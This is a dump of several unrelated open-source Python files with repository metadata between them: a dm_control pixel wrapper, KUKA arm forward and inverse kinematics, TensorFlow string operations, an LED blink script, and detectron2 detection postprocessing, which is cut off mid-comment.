# Copyright 2017 The dm_control Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Wrapper that adds pixel observations to a control environment.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections # Internal dependencies. from dm_control.rl import environment from dm_control.rl import specs STATE_KEY = 'state' class Wrapper(environment.Base): """Wraps a control environment and adds a rendered pixel observation.""" def __init__(self, env, pixels_only=True, render_kwargs=None, observation_key='pixels'): """Initializes a new pixel Wrapper. Args: env: The environment to wrap. pixels_only: If True (default), the original set of 'state' observations returned by the wrapped environment will be discarded, and the `OrderedDict` of observations will only contain pixels. If False, the `OrderedDict` will contain the original observations as well as the pixel observations. render_kwargs: Optional `dict` containing keyword arguments passed to the `mujoco.Physics.render` method. observation_key: Optional custom string specifying the pixel observation's key in the `OrderedDict` of observations. Defaults to 'pixels'. Raises: ValueError: If `env`'s observation spec is not compatible with the wrapper. Supported formats are a single array, or a dict of arrays. ValueError: If `env`'s observation already contains the specified `observation_key`. """ if render_kwargs is None: render_kwargs = {} wrapped_observation_spec = env.observation_spec() if isinstance(wrapped_observation_spec, specs.ArraySpec): self._observation_is_dict = False invalid_keys = set([STATE_KEY]) elif isinstance(wrapped_observation_spec, collections.MutableMapping): self._observation_is_dict = True invalid_keys = set(wrapped_observation_spec.keys()) else: raise ValueError('Unsupported observation spec structure.') if not pixels_only and observation_key in invalid_keys: raise ValueError('Duplicate or reserved observation key {!r}.' .format(observation_key)) if pixels_only: self._observation_spec = collections.OrderedDict() elif self._observation_is_dict: self._observation_spec = wrapped_observation_spec.copy() else: self._observation_spec = collections.OrderedDict() self._observation_spec[STATE_KEY] = wrapped_observation_spec # Extend observation spec. pixels = env.physics.render(**render_kwargs) pixels_spec = specs.ArraySpec( shape=pixels.shape, dtype=pixels.dtype, name=observation_key) self._observation_spec[observation_key] = pixels_spec self._env = env self._pixels_only = pixels_only self._render_kwargs = render_kwargs self._observation_key = observation_key def reset(self): time_step = self._env.reset() return self._add_pixel_observation(time_step) def step(self, action): time_step = self._env.step(action) return self._add_pixel_observation(time_step) def observation_spec(self): return self._observation_spec def action_spec(self): return self._env.action_spec() def _add_pixel_observation(self, time_step): if self._pixels_only: observation = collections.OrderedDict() elif self._observation_is_dict: observation = type(time_step.observation)(time_step.observation) else: observation = collections.OrderedDict() observation[STATE_KEY] = time_step.observation pixels = self._env.physics.render(**self._render_kwargs) observation[self._observation_key] = pixels return time_step._replace(observation=observation) def __getattr__(self, name): return getattr(self._env, name)
36.186992
80
0.722759
fefd085238abf72e3dddfcd2ba0f9969aea664cc
7,104
py
Python
kuka_arm/scripts/kinematics/kinematics.py
TheoKanning/RoboND-Kinematics-Project
f7c8d622b21db68174f4bb251ca3757a74d15db6
[ "MIT" ]
null
null
null
kuka_arm/scripts/kinematics/kinematics.py
TheoKanning/RoboND-Kinematics-Project
f7c8d622b21db68174f4bb251ca3757a74d15db6
[ "MIT" ]
null
null
null
kuka_arm/scripts/kinematics/kinematics.py
TheoKanning/RoboND-Kinematics-Project
f7c8d622b21db68174f4bb251ca3757a74d15db6
[ "MIT" ]
null
null
null
import numpy as np from sympy import symbols, cos, sin, pi, simplify, Transpose from math import atan2, sqrt, acos from sympy.matrices import Matrix # Symbols q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8') a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7') alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7') # DH Parameters s = {alpha0: 0, a0: 0, d1: 0.75, alpha1: -pi/2, a1: 0.35, d2: 0, q2: q2-pi/2, alpha2: 0, a2: 1.25, d3: 0, alpha3: -pi/2, a3: -0.054, d4: 1.50, alpha4: pi/2, a4: 0, d5: 0, alpha5: -pi/2, a5: 0, d6: 0, alpha6: 0, a6: 0, d7: 0.303, q7: 0} q = symbols('q') a = symbols('a') alpha = symbols('alpha') d = symbols('d') BASE_T = Matrix([[cos(q), -sin(q), 0, a], [sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d], [sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d], [0, 0, 0, 1]]) # Substitute DH parameters into base matrix to create joint transforms T0_1 = BASE_T.subs({alpha: alpha0, a: a0, d: d1, q: q1}).subs(s) T1_2 = BASE_T.subs({alpha: alpha1, a: a1, d: d2, q: q2}).subs(s) T2_3 = BASE_T.subs({alpha: alpha2, a: a2, d: d3, q: q3}).subs(s) T3_4 = BASE_T.subs({alpha: alpha3, a: a3, d: d4, q: q4}).subs(s) T4_5 = BASE_T.subs({alpha: alpha4, a: a4, d: d5, q: q5}).subs(s) T5_6 = BASE_T.subs({alpha: alpha5, a: a5, d: d6, q: q6}).subs(s) T6_G = BASE_T.subs({alpha: alpha6, a: a6, d: d7, q: q7}).subs(s) def print_matrix(matrix): # print in markdown table format print("col 1 | col 2 | col 3 | col 4") print("---|---|---|---") for row in range(matrix.shape[0]): output = "" for col in range(matrix.shape[1]): output += str(matrix[row, col]) if col != matrix.shape[1] - 1: output += " | " print(output) print_matrix((T3_4 * T4_5 * T5_6)) # Gripper link orientation correction R_z = Matrix([[cos(np.pi), -sin(np.pi), 0, 0], [sin(np.pi), cos(np.pi), 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]) R_y = Matrix([[cos(-np.pi/2), 0, sin(-np.pi/2), 0], [0, 1, 0, 0], [-sin(-np.pi/2), 0, cos(-np.pi/2), 0], [0, 0, 0, 1]]) R_corr = R_z * R_y def get_forward(angles): """ Calculates EE position and orientation given joint angles returns ([x, y, z], [x, y, z, w]) """ transform = T0_1.evalf(subs={q1: angles[0]}) transform *= T1_2.evalf(subs={q2: angles[1]}) transform *= T2_3.evalf(subs={q3: angles[2]}) transform *= T3_4.evalf(subs={q4: angles[3]}) transform *= T4_5.evalf(subs={q5: angles[4]}) transform *= T5_6.evalf(subs={q6: angles[5]}) transform *= T6_G transform *= R_corr.evalf() rotation = angles_from_transform(transform) x = transform[0, 3] y = transform[1, 3] z = transform[2, 3] return [x, y, z], rotation def angles_from_transform(transform): """ Returns the euler angles corresponding to the given 3x3 rotation matrix :param transform: 4x4 Matrix object :return: (roll, pitch, yaw) """ matrix = transform.evalf() r11 = matrix[0, 0] r21 = matrix[1, 0] r31 = matrix[2, 0] r32 = matrix[2, 1] r33 = matrix[2, 2] yaw = atan2(r21, r11) pitch = atan2(-r31, sqrt(r11**2 + r21**2)) roll = atan2(r32, r33) return roll, pitch, yaw def wrist_angles_from_transform(transform): """ Returns the necessary wrist joint angles to create the required transformation :param transform: Matrix object :return: theta4, theta5, theta6 """ matrix = transform.evalf() r13 = matrix[0, 2] r21 = matrix[1, 0] r22 = matrix[1, 1] r23 = matrix[1, 2] r33 = matrix[2, 2] # calculated by me theta4 = atan2(r33, -r13) theta5 = atan2(sqrt(r22 ** 2 + r21 ** 2), r23) theta6 = atan2(-r22, r21) return theta4, theta5, theta6 def create_rotation_matrix(angles): """ Returns a rotation matrix that will produce the given Euler angles :param angles: (roll, pitch, yaw) """ R_x = Matrix([[1, 0, 0], [0, cos(q), -sin(q)], [0, sin(q), cos(q)]]).evalf(subs={q: angles[0]}) R_y = Matrix([[cos(q), 0, sin(q)], [0, 1, 0], [-sin(q), 0, cos(q)]]).evalf(subs={q: angles[1]}) R_z = Matrix([[cos(q), -sin(q), 0], [sin(q), cos(q), 0], [0, 0, 1]]).evalf(subs={q: angles[2]}) return R_z * R_y * R_x def get_corrected_total_rotation(angles): """ Return the rotation matrix corresponding to the given gripper angles, taking into account the correction matrix :param angles: [roll, pitch, yaw] in radians :return: 3x3 Matrix """ return create_rotation_matrix(angles) * R_corr[:3, :3] def get_wrist_center(ee_position, ee_orientation): """ Return the wrist center for a given ee position and orientation """ gripper_position = Matrix(ee_position) r0_6 = get_corrected_total_rotation(ee_orientation) # d7 is distance from joint 6 to gripper displacement = r0_6 * Matrix([[0], [0], [d7]]).evalf(subs=s) wc_position = gripper_position - displacement return wc_position def get_first_three_joints(wrist_pos): """ Calculate angles of the first three joints for the given wrist position :param wrist_pos: (x, y, z) :return: (joint1, joint2, joint3) """ # project onto xy plane theta1 = atan2(wrist_pos[1], wrist_pos[0]) def law_of_cosines(a, b, c): """ Return angle given lengths of sides a, b, and c """ return acos((c ** 2 - a ** 2 - b ** 2) / (-2 * a * b)) link2 = s[a2] link3 = sqrt(s[a3]**2 + s[d4]**2) # wrist position projected onto plane of arm, minus joint 2 position projected_wc = sqrt(wrist_pos[0]**2 + wrist_pos[1]**2) - s[a1], wrist_pos[2] - s[d1] d2_wc = sqrt(projected_wc[0]**2 + projected_wc[1]**2) # theta 2 is equal to the triangle angle plus the angle of the wc theta2 = law_of_cosines(link2, d2_wc, link3) + atan2(projected_wc[1], projected_wc[0]) theta2 = -theta2 + np.pi / 2 # correct for join 2 orientation # add correction because link is not straight theta3 = - law_of_cosines(link2, link3, d2_wc) + np.pi/2 + atan2(s[a3], s[d4]) return theta1, theta2, theta3 def get_inverse(position, orientation): """ Given the desired position and orientation of the end effector, calculate the required joint angles :param position: :param orientation: :return: """ wc = get_wrist_center(position, orientation) theta1, theta2, theta3 = get_first_three_joints(wc) r0_3 = (T0_1 * T1_2 * T2_3).evalf(subs={q1: theta1, q2: theta2, q3: theta3})[:3, :3] r0_6 = get_corrected_total_rotation(orientation) r3_6 = Transpose(r0_3) * r0_6 theta4, theta5, theta6 = wrist_angles_from_transform(r3_6) return theta1, theta2, theta3, theta4, theta5, theta6
31.856502
115
0.586149
113795df6298a28b96a9970379646d5627f1ba5e
21,823
py
Python
tensorflow/python/ops/string_ops.py
joshz123/tensorflow
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
[ "Apache-2.0" ]
57
2017-09-03T07:08:31.000Z
2022-02-28T04:33:42.000Z
tensorflow/python/ops/string_ops.py
joshz123/tensorflow
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
[ "Apache-2.0" ]
58
2021-11-22T05:41:28.000Z
2022-01-19T01:33:40.000Z
tensorflow/python/ops/string_ops.py
joshz123/tensorflow
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
[ "Apache-2.0" ]
66
2020-05-15T10:05:12.000Z
2022-02-14T07:28:18.000Z
# -*- coding: utf-8 -*- # Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Operations for working with string Tensors.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import sparse_tensor from tensorflow.python.framework import tensor_util from tensorflow.python.ops import array_ops from tensorflow.python.ops import gen_parsing_ops from tensorflow.python.ops import gen_string_ops from tensorflow.python.ops import math_ops # go/tf-wildcard-import # pylint: disable=wildcard-import # pylint: disable=g-bad-import-order from tensorflow.python.ops.gen_string_ops import * from tensorflow.python.util import compat as util_compat from tensorflow.python.util import deprecation from tensorflow.python.util import dispatch from tensorflow.python.util.tf_export import tf_export # pylint: enable=g-bad-import-order # pylint: enable=wildcard-import # pylint: disable=redefined-builtin @tf_export("strings.regex_full_match") @dispatch.add_dispatch_support def regex_full_match(input, pattern, name=None): r"""Match elements of `input` with regex `pattern`. Args: input: string `Tensor`, the source strings to process. pattern: string or scalar string `Tensor`, regular expression to use, see more details at https://github.com/google/re2/wiki/Syntax name: Name of the op. Returns: bool `Tensor` of the same shape as `input` with match results. """ if isinstance(pattern, util_compat.bytes_or_text_types): # When `pattern` is static through the life of the op we can # use a version which performs the expensive regex compilation once at # creation time. return gen_string_ops.static_regex_full_match( input=input, pattern=pattern, name=name) return gen_string_ops.regex_full_match( input=input, pattern=pattern, name=name) regex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__ @tf_export( "strings.regex_replace", v1=["strings.regex_replace", "regex_replace"]) @deprecation.deprecated_endpoints("regex_replace") @dispatch.add_dispatch_support def regex_replace(input, pattern, rewrite, replace_global=True, name=None): r"""Replace elements of `input` matching regex `pattern` with `rewrite`. >>> tf.strings.regex_replace("Text with tags.<br /><b>contains html</b>", ... "<[^>]+>", " ") <tf.Tensor: shape=(), dtype=string, numpy=b'Text with tags. contains html '> Args: input: string `Tensor`, the source strings to process. pattern: string or scalar string `Tensor`, regular expression to use, see more details at https://github.com/google/re2/wiki/Syntax rewrite: string or scalar string `Tensor`, value to use in match replacement, supports backslash-escaped digits (\1 to \9) can be to insert text matching corresponding parenthesized group. replace_global: `bool`, if `True` replace all non-overlapping matches, else replace only the first match. name: A name for the operation (optional). Returns: string `Tensor` of the same shape as `input` with specified replacements. """ if (isinstance(pattern, util_compat.bytes_or_text_types) and isinstance(rewrite, util_compat.bytes_or_text_types)): # When `pattern` and `rewrite` are static through the life of the op we can # use a version which performs the expensive regex compilation once at # creation time. return gen_string_ops.static_regex_replace( input=input, pattern=pattern, rewrite=rewrite, replace_global=replace_global, name=name) return gen_string_ops.regex_replace( input=input, pattern=pattern, rewrite=rewrite, replace_global=replace_global, name=name) @tf_export("strings.format") def string_format(template, inputs, placeholder="{}", summarize=3, name=None): r"""Formats a string template using a list of tensors. Formats a string template using a list of tensors, abbreviating tensors by only printing the first and last `summarize` elements of each dimension (recursively). If formatting only one tensor into a template, the tensor does not have to be wrapped in a list. Example: Formatting a single-tensor template: ```python sess = tf.compat.v1.Session() with sess.as_default(): tensor = tf.range(10) formatted = tf.strings.format("tensor: {}, suffix", tensor) out = sess.run(formatted) expected = "tensor: [0 1 2 ... 7 8 9], suffix" assert(out.decode() == expected) ``` Formatting a multi-tensor template: ```python sess = tf.compat.v1.Session() with sess.as_default(): tensor_one = tf.reshape(tf.range(100), [10, 10]) tensor_two = tf.range(10) formatted = tf.strings.format("first: {}, second: {}, suffix", (tensor_one, tensor_two)) out = sess.run(formatted) expected = ("first: [[0 1 2 ... 7 8 9]\n" " [10 11 12 ... 17 18 19]\n" " [20 21 22 ... 27 28 29]\n" " ...\n" " [70 71 72 ... 77 78 79]\n" " [80 81 82 ... 87 88 89]\n" " [90 91 92 ... 97 98 99]], second: [0 1 2 ... 7 8 9], suffix") assert(out.decode() == expected) ``` Args: template: A string template to format tensor values into. inputs: A list of `Tensor` objects, or a single Tensor. The list of tensors to format into the template string. If a solitary tensor is passed in, the input tensor will automatically be wrapped as a list. placeholder: An optional `string`. Defaults to `{}`. At each placeholder occurring in the template, a subsequent tensor will be inserted. summarize: An optional `int`. Defaults to `3`. When formatting the tensors, show the first and last `summarize` entries of each tensor dimension (recursively). If set to -1, all elements of the tensor will be shown. name: A name for the operation (optional). Returns: A scalar `Tensor` of type `string`. Raises: ValueError: if the number of placeholders does not match the number of inputs. """ # If there is only one tensor to format, we will automatically wrap it in a # list to simplify the user experience if tensor_util.is_tensor(inputs): inputs = [inputs] if template.count(placeholder) != len(inputs): raise ValueError("%s placeholder(s) in template does not match %s tensor(s)" " provided as input" % (template.count(placeholder), len(inputs))) return gen_string_ops.string_format(inputs, template=template, placeholder=placeholder, summarize=summarize, name=name) # Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which # defines a wrapper for this function. def string_split(source, sep=None, skip_empty=True, delimiter=None): # pylint: disable=invalid-name """Split elements of `source` based on `delimiter` into a `SparseTensor`. Let N be the size of source (typically N will be the batch size). Split each element of `source` based on `delimiter` and return a `SparseTensor` containing the split tokens. Empty tokens are ignored. If `sep` is an empty string, each element of the `source` is split into individual strings, each containing one byte. (This includes splitting multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is treated as a set of delimiters with each considered a potential split point. For example: N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output will be st.indices = [0, 0; 0, 1; 1, 0; 1, 1; 1, 2] st.shape = [2, 3] st.values = ['hello', 'world', 'a', 'b', 'c'] Args: source: `1-D` string `Tensor`, the strings to split. sep: `0-D` string `Tensor`, the delimiter character, the string should be length 0 or 1. Default is ' '. skip_empty: A `bool`. If `True`, skip the empty strings from the result. delimiter: deprecated alias for `sep`. Raises: ValueError: If delimiter is not a string. Returns: A `SparseTensor` of rank `2`, the strings split according to the delimiter. The first column of the indices corresponds to the row in `source` and the second column corresponds to the index of the split component in this row. """ delimiter = deprecation.deprecated_argument_lookup( "sep", sep, "delimiter", delimiter) if delimiter is None: delimiter = " " delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string) source = ops.convert_to_tensor(source, dtype=dtypes.string) indices, values, shape = gen_string_ops.string_split( source, delimiter=delimiter, skip_empty=skip_empty) indices.set_shape([None, 2]) values.set_shape([None]) shape.set_shape([2]) return sparse_tensor.SparseTensor(indices, values, shape) # Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which # defines a wrapper for this function. def string_split_v2(source, sep=None, maxsplit=-1): """Split elements of `source` based on `sep` into a `SparseTensor`. Let N be the size of source (typically N will be the batch size). Split each element of `source` based on `sep` and return a `SparseTensor` containing the split tokens. Empty tokens are ignored. For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output will be st.indices = [0, 0; 0, 1; 1, 0; 1, 1; 1, 2] st.shape = [2, 3] st.values = ['hello', 'world', 'a', 'b', 'c'] If `sep` is given, consecutive delimiters are not grouped together and are deemed to delimit empty strings. For example, source of `"1<>2<><>3"` and sep of `"<>"` returns `["1", "2", "", "3"]`. If `sep` is None or an empty string, consecutive whitespace are regarded as a single separator, and the result will contain no empty strings at the start or end if the string has leading or trailing whitespace. Note that the above mentioned behavior matches python's str.split. Args: source: `1-D` string `Tensor`, the strings to split. sep: `0-D` string `Tensor`, the delimiter character. maxsplit: An `int`. If `maxsplit > 0`, limit of the split of the result. Raises: ValueError: If sep is not a string. Returns: A `SparseTensor` of rank `2`, the strings split according to the delimiter. The first column of the indices corresponds to the row in `source` and the second column corresponds to the index of the split component in this row. """ if sep is None: sep = "" sep = ops.convert_to_tensor(sep, dtype=dtypes.string) source = ops.convert_to_tensor(source, dtype=dtypes.string) indices, values, shape = gen_string_ops.string_split_v2( source, sep=sep, maxsplit=maxsplit) indices.set_shape([None, 2]) values.set_shape([None]) shape.set_shape([2]) return sparse_tensor.SparseTensor(indices, values, shape) def _reduce_join_reduction_dims(x, axis): """Returns range(rank(x) - 1, 0, -1) if axis is None; or axis otherwise.""" if axis is not None: return axis else: # Fast path: avoid creating Rank and Range ops if ndims is known. if x.get_shape().ndims is not None: return constant_op.constant( np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32) # Otherwise, we rely on Range and Rank to do the right thing at run-time. return math_ops.range(array_ops.rank(x) - 1, -1, -1) @tf_export(v1=["strings.reduce_join", "reduce_join"]) @deprecation.deprecated_args(None, "keep_dims is deprecated, use keepdims instead", "keep_dims") @deprecation.deprecated_endpoints("reduce_join") def reduce_join(inputs, axis=None, # pylint: disable=missing-docstring keep_dims=None, separator="", name=None, reduction_indices=None, keepdims=None): keepdims = deprecation.deprecated_argument_lookup("keepdims", keepdims, "keep_dims", keep_dims) if keep_dims is None: keep_dims = False axis = deprecation.deprecated_argument_lookup("axis", axis, "reduction_indices", reduction_indices) return reduce_join_v2( inputs=inputs, axis=axis, keepdims=keepdims, separator=separator, name=name) @tf_export("strings.reduce_join", v1=[]) @dispatch.add_dispatch_support def reduce_join_v2( # pylint: disable=missing-docstring inputs, axis=None, keepdims=False, separator="", name=None): """Joins all strings into a single string, or joins along an axis. >>> tf.strings.reduce_join([['abc','123'], ... ['def','456']]).numpy() b'abc123def456' >>> tf.strings.reduce_join([['abc','123'], ... ['def','456']], axis=-1).numpy() array([b'abc123', b'def456'], dtype=object) >>> tf.strings.reduce_join([['abc','123'], ... ['def','456']], ... axis=-1, ... separator=" ").numpy() array([b'abc 123', b'def 456'], dtype=object) Args: inputs: A `tf.string` tensor. axis: Which axis to join along. The default behavior is to join all elements, producing a scalar. keepdims: If true, retains reduced dimensions with length 1. separator: a string added between each string being joined. name: A name for the operation (optional). Returns: A `tf.string` tensor. """ with ops.name_scope(None, "ReduceJoin", [inputs, axis]): inputs_t = ops.convert_to_tensor(inputs) axis = _reduce_join_reduction_dims(inputs_t, axis) return gen_string_ops.reduce_join( inputs=inputs_t, reduction_indices=axis, keep_dims=keepdims, separator=separator, name=name) reduce_join.__doc__ = reduce_join_v2.__doc__ # This wrapper provides backwards compatibility for code that predates the # unit argument and that passed 'name' as a positional argument. @tf_export(v1=["strings.length"]) @dispatch.add_dispatch_support def string_length(input, name=None, unit="BYTE"): """Computes the length of each string given in the input tensor. >>> strings = tf.constant(['Hello','TensorFlow', '🙂']) >>> tf.strings.length(strings).numpy() # default counts bytes array([ 5, 10, 4], dtype=int32) >>> tf.strings.length(strings, unit="UTF8_CHAR").numpy() array([ 5, 10, 1], dtype=int32) Args: input: A `Tensor` of type `string`. The strings for which to compute the length for each element. name: A name for the operation (optional). unit: An optional `string` from: `"BYTE", "UTF8_CHAR"`. Defaults to `"BYTE"`. The unit that is counted to compute string length. One of: `"BYTE"` (for the number of bytes in each string) or `"UTF8_CHAR"` (for the number of UTF-8 encoded Unicode code points in each string). Results are undefined if `unit=UTF8_CHAR` and the `input` strings do not contain structurally valid UTF-8. Returns: A `Tensor` of type `int32`, containing the length of the input string in the same element of the input tensor. """ return gen_string_ops.string_length(input, unit=unit, name=name) @tf_export("strings.length", v1=[]) @dispatch.add_dispatch_support def string_length_v2(input, unit="BYTE", name=None): return gen_string_ops.string_length(input, unit=unit, name=name) string_length_v2.__doc__ = gen_string_ops.string_length.__doc__ @tf_export(v1=["substr"]) @deprecation.deprecated(None, "Use `tf.strings.substr` instead of `tf.substr`.") def substr_deprecated(input, pos, len, name=None, unit="BYTE"): return substr(input, pos, len, name=name, unit=unit) substr_deprecated.__doc__ = gen_string_ops.substr.__doc__ @tf_export(v1=["strings.substr"]) @dispatch.add_dispatch_support def substr(input, pos, len, name=None, unit="BYTE"): return gen_string_ops.substr(input, pos, len, unit=unit, name=name) substr.__doc__ = gen_string_ops.substr.__doc__ @tf_export("strings.substr", v1=[]) @dispatch.add_dispatch_support def substr_v2(input, pos, len, unit="BYTE", name=None): return gen_string_ops.substr(input, pos, len, unit=unit, name=name) substr_v2.__doc__ = gen_string_ops.substr.__doc__ ops.NotDifferentiable("RegexReplace") ops.NotDifferentiable("StringToHashBucket") ops.NotDifferentiable("StringToHashBucketFast") ops.NotDifferentiable("StringToHashBucketStrong") ops.NotDifferentiable("ReduceJoin") ops.NotDifferentiable("StringJoin") ops.NotDifferentiable("StringSplit") ops.NotDifferentiable("AsString") ops.NotDifferentiable("EncodeBase64") ops.NotDifferentiable("DecodeBase64") @tf_export("strings.to_number", v1=[]) @dispatch.add_dispatch_support def string_to_number(input, out_type=dtypes.float32, name=None): r"""Converts each string in the input Tensor to the specified numeric type. (Note that int32 overflow results in an error while float overflow results in a rounded value.) Examples: >>> tf.strings.to_number("1.55") <tf.Tensor: shape=(), dtype=float32, numpy=1.55> >>> tf.strings.to_number("3", tf.int32) <tf.Tensor: shape=(), dtype=int32, numpy=3> Args: input: A `Tensor` of type `string`. out_type: An optional `tf.DType` from: `tf.float32, tf.float64, tf.int32, tf.int64`. Defaults to `tf.float32`. The numeric type to interpret each string in `string_tensor` as. name: A name for the operation (optional). Returns: A `Tensor` of type `out_type`. """ return gen_parsing_ops.string_to_number(input, out_type, name) @tf_export(v1=["strings.to_number", "string_to_number"]) def string_to_number_v1( string_tensor=None, out_type=dtypes.float32, name=None, input=None): string_tensor = deprecation.deprecated_argument_lookup( "input", input, "string_tensor", string_tensor) return gen_parsing_ops.string_to_number(string_tensor, out_type, name) string_to_number_v1.__doc__ = gen_parsing_ops.string_to_number.__doc__ @tf_export("strings.to_hash_bucket", v1=[]) @dispatch.add_dispatch_support def string_to_hash_bucket(input, num_buckets, name=None): # pylint: disable=line-too-long r"""Converts each string in the input Tensor to its hash mod by a number of buckets. The hash function is deterministic on the content of the string within the process. Note that the hash function may change from time to time. This functionality will be deprecated and it's recommended to use `tf.strings.to_hash_bucket_fast()` or `tf.strings.to_hash_bucket_strong()`. Examples: >>> tf.strings.to_hash_bucket(["Hello", "TensorFlow", "2.x"], 3) <tf.Tensor: shape=(3,), dtype=int64, numpy=array([2, 0, 1])> Args: input: A `Tensor` of type `string`. num_buckets: An `int` that is `>= 1`. The number of buckets. name: A name for the operation (optional). Returns: A `Tensor` of type `int64`. """ # pylint: enable=line-too-long return gen_string_ops.string_to_hash_bucket(input, num_buckets, name) @tf_export(v1=["strings.to_hash_bucket", "string_to_hash_bucket"]) def string_to_hash_bucket_v1( string_tensor=None, num_buckets=None, name=None, input=None): string_tensor = deprecation.deprecated_argument_lookup( "input", input, "string_tensor", string_tensor) return gen_string_ops.string_to_hash_bucket(string_tensor, num_buckets, name) string_to_hash_bucket_v1.__doc__ = gen_string_ops.string_to_hash_bucket.__doc__ @tf_export("strings.join", v1=["strings.join", "string_join"]) @deprecation.deprecated_endpoints("string_join") @dispatch.add_dispatch_support def string_join(inputs, separator="", name=None): """Perform element-wise concatenation of a list of string tensors. Given a list of string tensors of same shape, performs element-wise concatenation of the strings of the same index in all tensors. >>> tf.strings.join(['abc','def']).numpy() b'abcdef' >>> tf.strings.join([['abc','123'], ... ['def','456'], ... ['ghi','789']]).numpy() array([b'abcdefghi', b'123456789'], dtype=object) >>> tf.strings.join([['abc','123'], ... ['def','456']], ... separator=" ").numpy() array([b'abc def', b'123 456'], dtype=object) Args: inputs: A list of `tf.Tensor` objects of same size and `tf.string` dtype. separator: A string added between each string being joined. name: A name for the operation (optional). Returns: A `tf.string` tensor. """ return gen_string_ops.string_join(inputs, separator=separator, name=name)
37.432247
100
0.680704
54ae8c29dc0b79ef643b52c18e7c2540f8426a26
147
py
Python
test.py
cfreeman/hota-alinta
70f07a853800bf051e17a51e099b9d8069a35561
[ "Unlicense" ]
null
null
null
test.py
cfreeman/hota-alinta
70f07a853800bf051e17a51e099b9d8069a35561
[ "Unlicense" ]
null
null
null
test.py
cfreeman/hota-alinta
70f07a853800bf051e17a51e099b9d8069a35561
[ "Unlicense" ]
null
null
null
from gpiozero import LED from time import sleep led = LED(14) while True: led.on() sleep(0.1) led.off() sleep(1)
13.363636
24
0.55102
a07c2964d8db6638677a8cff4f67c2d16ebc116d
10,886
py
Python
detectron2/modeling/postprocessing.py
sksmslhy/InstanceShadowDetection
44f9910fb3e14bb03e0a30576021943bff8e4120
[ "Apache-2.0" ]
100
2020-06-10T08:34:20.000Z
2022-03-28T17:08:46.000Z
detectron2/modeling/postprocessing.py
temperrain/InstanceShadowDetection
1bcf911ba5dfdefbd22397409cd56e169040abe5
[ "Apache-2.0" ]
17
2020-06-12T13:13:42.000Z
2022-03-12T00:34:37.000Z
detectron2/modeling/postprocessing.py
temperrain/InstanceShadowDetection
1bcf911ba5dfdefbd22397409cd56e169040abe5
[ "Apache-2.0" ]
18
2020-06-20T04:05:53.000Z
2022-03-01T06:58:47.000Z
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved from torch.nn import functional as F import math import numpy as np from detectron2.layers import paste_masks_in_image from detectron2.structures import Boxes, BoxMode, Instances import pysobatools.sobaeval as eval def decode(segm): return eval.maskUtils.decode(segm).astype('uint8') def encode(segm): return eval.maskUtils.encode(segm) def detector_postprocess(results, output_height, output_width, mask_threshold=0.5): """ Resize the output instances. The input images are often resized when entering an object detector. As a result, we often need the outputs of the detector in a different resolution from its inputs. This function will resize the raw outputs of an R-CNN detector to produce outputs according to the desired output resolution. Args: results (Instances): the raw outputs from the detector. `results.image_size` contains the input image resolution the detector sees. This object might be modified in-place. output_height, output_width: the desired output resolution. Returns: Instances: the resized output from the model, based on the output resolution """ scale_x, scale_y = (output_width / results.image_size[1], output_height / results.image_size[0]) results = Instances((output_height, output_width), **results.get_fields()) if results.has("pred_boxes"): output_boxes = results.pred_boxes elif results.has("proposal_boxes"): output_boxes = results.proposal_boxes output_boxes.tensor[:, 0::2] *= scale_x output_boxes.tensor[:, 1::2] *= scale_y output_boxes.clip(results.image_size) results = results[output_boxes.nonempty()] if results.has("pred_masks"): results.pred_masks = paste_masks_in_image( results.pred_masks[:, 0, :, :], # N, 1, M, M results.pred_boxes, results.image_size, threshold=mask_threshold, ) if results.has("pred_keypoints"): results.pred_keypoints[:, :, 0] *= scale_x results.pred_keypoints[:, :, 1] *= scale_y return results def sem_seg_postprocess(result, img_size, output_height, output_width): """ Return semantic segmentation predictions in the original resolution. The input images are often resized when entering semantic segmentor. Moreover, in same cases, they also padded inside segmentor to be divisible by maximum network stride. As a result, we often need the predictions of the segmentor in a different resolution from its inputs. Args: result (Tensor): semantic segmentation prediction logits. A tensor of shape (C, H, W), where C is the number of classes, and H, W are the height and width of the prediction. img_size (tuple): image size that segmentor is taking as input. output_height, output_width: the desired output resolution. Returns: semantic segmentation prediction (Tensor): A tensor of the shape (C, output_height, output_width) that contains per-pixel soft predictions. """ result = result[:, : img_size[0], : img_size[1]].expand(1, -1, -1, -1) result = F.interpolate( result, size=(output_height, output_width), mode="bilinear", align_corners=False )[0] return result def takeTwo(elm): return elm[1] # # """ # param: # rec1: 